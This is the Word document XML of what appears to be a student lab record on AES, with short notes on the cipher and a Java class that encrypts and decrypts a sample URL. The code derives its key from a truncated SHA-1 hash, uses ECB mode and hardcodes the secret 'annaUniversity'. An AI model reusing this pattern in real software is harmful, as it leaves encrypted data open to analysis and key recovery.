    <w:p w14:paraId="1EBDAAE5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D51D20E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F44C22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES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principle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substitution–permutation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519A7AB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="156"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Feistel network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DES,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variant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Rijndael.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14421394" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="151"/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has a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128 bits,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and a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128,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192,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256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bits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5E10B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="153"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>operates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×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column-major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bytes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>termed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state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C73964" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F1755C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3047ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="85"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A443274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5506096" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4796292B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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AES.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B625D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="360" w:right="4789"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.io.UnsupportedEncodingException;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java.security.MessageDigest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5C2E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="4602"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.security.NoSuchAlgorithmException;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java.util.Arrays;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2FB0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="360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java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5285E130" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751CC281" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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javax.crypto.Cipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EC76C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="5463"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>javax.crypto.spec.SecretKeySpec;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>public class AES {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E155E1D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="638" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>private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SecretKeySpec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>secretKey;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>private static byte[] key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C85D53" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B0E404" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="4139" w:hanging="279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setKey(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>myKey)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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MessageDigest sha = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E281D08" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>try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3EEA2DC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>key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myKey.getBytes("UTF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>8");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA9B6E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1198" w:right="3449"/>
      </w:pPr>
      <w:r>
        <w:t>sha</w:t>
      </w:r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MessageDigest.getInstance("SHA-1");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sha.digest(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075985B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>key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Arrays.copyOf(key,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B33D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>secretKey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SecretKeySpec(key,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> "AES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAFA234" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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(NoSuchAlgorithmException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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BEE9775" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:sectPr w:rsidR="00A16F47">
          <w:type w:val="continuous"/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353301" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F27C7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198" w:right="4861" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(UnsupportedEncodingException</w:t>
      </w:r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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E9A0F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2E88F257" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20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56C5B29E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79624E62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto"/>
        <w:ind w:left="1198" w:right="2222" w:hanging="560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encrypt(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>strToEncrypt,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secret)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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setKey(secret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65F086" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher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2"/>
        </w:rPr>
        <w:t>Cipher.getInstance("AES/ECB/PKCS5Padding");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C92650" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>cipher.init(Cipher.ENCRYPT_MODE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF9889" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198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Base64.getEncoder().encodeToString(cipher.doFinal(strToEncrypt.getBytes("UTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BB8EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-8")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54925149" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="917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C453AA9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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encrypting: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e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E81067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1FCA234D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
        <w:ind w:left="917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null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8F952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5B41890B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="242"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C33450E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto"/>
        <w:ind w:left="1198" w:right="2222" w:hanging="560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decrypt(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>strToDecrypt,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secret)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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setKey(secret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED3706" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="242" w:lineRule="exact"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher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2"/>
        </w:rPr>
        <w:t>Cipher.getInstance("AES/ECB/PKCS5PADDING");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864D4A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="4318"/>
      </w:pPr>
      <w:r>
        <w:t>cipher.init(Cipher.DECRYPT_MODE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>secretKey); return new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E9443" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>String(cipher.doFinal(Base64.getDecoder().decode(strToDecrypt)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA8B68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917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B52F00A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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decrypting: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e.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFB8FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43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36F826B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
        <w:ind w:left="917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null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1F06D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="5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24A17D69" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6254E9A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E93A013" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="638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070E9E5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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secretKey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"annaUniversity";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9CCBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C01A45" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>originalString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"</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:spacing w:val="-2"/>
          </w:rPr>
          <w:t>www.annauniv.edu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC981F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encryptedString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AES.encrypt(originalString,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18248294" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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B22CC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>decryptedString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AES.decrypt(encryptedString,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>secretKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6CA3F0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD9F945" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8987"/>
        </w:tabs>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17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AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Algorithm\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C7FB2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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originalString);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.println("Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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10"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB88E8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encryptedString);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.println("Decrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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decryptedString);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC023CB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43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2929F1CC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492DEAC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01950C65" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E093D55" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5382BA06" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="176"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59275CCF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562048DD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
